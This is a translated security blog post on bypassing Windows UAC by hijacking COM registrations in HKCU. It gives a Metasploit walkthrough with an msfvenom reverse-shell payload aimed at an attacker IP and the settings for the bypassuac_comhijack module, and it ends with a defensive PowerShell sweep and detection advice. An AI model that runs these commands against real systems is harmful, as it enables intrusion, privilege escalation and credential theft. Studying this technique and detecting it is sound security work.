COM hijacking to bypass UAC

What is COM
COM is the abbreviation of Component Object Model.
COM is a binary interface standard developed by Microsoft for building software out of reusable components. Under the COM architecture, developers write components with specific functions, each identified and registered on the system, and then combine them to form a complex application.

CLSID
A CLSID (Class Identifier) is a globally unique identifier (GUID). Windows assigns a CLSID to each registered COM class, file type, OLE object, special folder and system component, and uses it to tell that object apart from every other one. When a process asks COM for a class, it asks by CLSID, and the registry maps that CLSID to the file that implements it.
COM component lookup order

When a CLSID is resolved, the registry locations below are consulted in this order, and the first match wins:

1: HKCU\Software\Classes\CLSID (the current user's per-user registrations)
2: HKCR\CLSID (HKCR is a merged view of HKCU\Software\Classes and HKLM\Software\Classes, so this is effectively the machine-wide HKLM\Software\Classes\CLSID hive)
3: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\

The security-relevant point is that the per-user hive comes first and is writable by the user without elevation.

Much of Windows is built from COM components rather than from flat APIs: many Windows APIs and shell features instantiate COM objects under the hood, so a process that never calls COM explicitly may still resolve CLSIDs and load COM servers.

How COM component hijacking works

When a process looks up a COM component, it first consults:
HKCU\Software\Classes\CLSID
If we create a key for the target CLSID under that path, our entry shadows the machine-wide registration and the process loads what we point it at. One per-user key can hijack a single process or every process that uses that CLSID.
The idea is close to DLL hijacking, but COM hijacking is more flexible: the target is not necessarily a single process, and the file we substitute is not necessarily a DLL. An InprocServer32 entry loads a DLL into the calling process; a LocalServer32 entry launches any executable (a PE binary) out of process. The target can also be a Windows API that internally instantiates the hijacked CLSID.

Metasploit BypassUAC example

First generate the payload and run it on the Windows 7 target:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.17.177 LPORT=4444 -f exe > payload.exe

After the handler catches the session, getsystem fails: the session belongs to a local administrator but runs at medium integrity under UAC, so the SYSTEM impersonation techniques cannot be used. We use COM hijacking to bypass UAC.

Use the bypassuac_comhijack exploit module, point it at the low-privilege session and set up the listener. The payload architecture must match the target OS architecture (the current session's architecture may differ), so for this 64-bit Windows 7 box we use the x64 payload. The module also needs SESSION, LHOST and LPORT; if the original handler job is still listening on 4444, pick a free port instead.
use exploit/windows/local/bypassuac_comhijack
set SESSION 1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.17.177
set LPORT 4444

Once the options are set, run the module.

After run, the module creates a registry key for the hijacked CLSID (the GUID in braces in the screenshot) under HKCU\Software\Classes\CLSID, uploads the DLL it generated to the target and sets the key's InprocServer32 value to the path of that DLL. It then launches the auto-elevating target binary, which loads the DLL at high integrity and sends back a new session. In that elevated session getsystem succeeds and we get SYSTEM. From there we can escalate further, persist, dump credentials and so on.

The principle is that Event Viewer (eventvwr.exe, which runs as an mmc.exe console) is a Microsoft-signed binary that auto-elevates without a UAC prompt and instantiates a specific CLSID while starting. The module does not replace that CLSID; it registers the same CLSID under the current user's hive, which COM consults before the machine-wide hive. When the hijacked program starts, the component lookup lands on our per-user key, the DLL named in its InprocServer32 value is loaded into the elevated process's memory space, and the shellcode in the DLL runs at high integrity and connects back with an elevated session. Two caveats a practitioner should check before relying on this: the user must be a member of the local Administrators group with UAC at its default level (at "Always notify" the auto-elevation does not happen), and the module removes the registry keys once the payload has run, so a post-hoc registry sweep may find nothing while a recorded registry write under HKCU\Software\Classes\CLSID followed by an eventvwr.exe or mmc.exe launch is still visible in telemetry.
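The following PowerShell script is an added example, not code from the original post or from the Metasploit module. It demonstrates both points above: Resolve-ComClsid walks the lookup order described in the "COM component lookup order" section (per-user hive first, then machine hive, with HKCR treated as the merged view it is), and Find-UserClsidOverrides sweeps HKCU\Software\Classes\CLSID for exactly the kind of per-user registration the bypass creates, reporting whether each one shadows a machine-wide entry and whether its server file lives somewhere an unprivileged user can write. It assumes a Windows host with the registry provider available; the regular expression used to flag user-writable paths is a heuristic of my own, not a Windows rule.

```powershell
# Added example (not from the original post): resolve a CLSID the way COM does,
# HKCU\Software\Classes first, then HKLM\Software\Classes, and sweep the
# per-user hive for registrations that shadow machine-wide ones.

function Get-ComServerPath {
    param([string]$Root, [string]$Clsid)
    # InprocServer32 names a DLL loaded into the caller (what the hijack uses);
    # LocalServer32 names an executable started out of process.
    foreach ($sub in 'InprocServer32', 'LocalServer32') {
        $key = Join-Path $Root "CLSID\$Clsid\$sub"
        if (Test-Path $key) {
            $value = (Get-ItemProperty -Path $key).'(default)'
            if ($value) {
                return [pscustomobject]@{ ServerType = $sub; Path = $value }
            }
        }
    }
    return $null
}

function Resolve-ComClsid {
    param([Parameter(Mandatory)][string]$Clsid)
    # Lookup order from the post: the current user's hive wins over the
    # machine hive. HKCR is a merged view of the two, not a third source.
    $hives = @(
        @{ Name = 'HKCU'; Root = 'HKCU:\Software\Classes' },
        @{ Name = 'HKLM'; Root = 'HKLM:\Software\Classes' }
    )
    foreach ($hive in $hives) {
        $server = Get-ComServerPath -Root $hive.Root -Clsid $Clsid
        if ($server) {
            return [pscustomobject]@{
                Clsid      = $Clsid
                Hive       = $hive.Name
                ServerType = $server.ServerType
                Path       = $server.Path
            }
        }
    }
    return $null
}

function Find-UserClsidOverrides {
    # Every CLSID registered per-user is a hijack candidate. Report whether it
    # shadows a machine-wide registration and whether the server path sits in
    # a location a standard user can write to (heuristic, assumed here).
    $userRoot = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path $userRoot)) { return @() }
    Get-ChildItem -Path $userRoot | ForEach-Object {
        $clsid   = $_.PSChildName
        $user    = Get-ComServerPath -Root 'HKCU:\Software\Classes' -Clsid $clsid
        $machine = Get-ComServerPath -Root 'HKLM:\Software\Classes' -Clsid $clsid
        if ($user) {
            [pscustomobject]@{
                Clsid          = $clsid
                ServerType     = $user.ServerType
                UserPath       = $user.Path
                MachinePath    = if ($machine) { $machine.Path } else { '<none>' }
                ShadowsMachine = [bool]$machine
                UserWritable   = [bool]($user.Path -match '\\Users\\|\\AppData\\|\\Temp\\')
            }
        }
    }
}

# Usage: sweep the current user's hive, most suspicious entries first.
Find-UserClsidOverrides |
    Sort-Object ShadowsMachine, UserWritable -Descending |
    Format-Table -AutoSize
```

Run the sweep as the user whose session was compromised, since HKCU is per-user. A hit with ShadowsMachine and UserWritable both true is the pattern this post's bypass leaves behind while it is in progress. Because the module cleans its keys up afterwards, pair the sweep with registry-write telemetry (for example Sysmon event ID 13 on values under HKCU\Software\Classes\CLSID\*\InprocServer32) so the short-lived write is not missed.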

Source: blog.csdn.net/weixin_45682070/article/details/109911748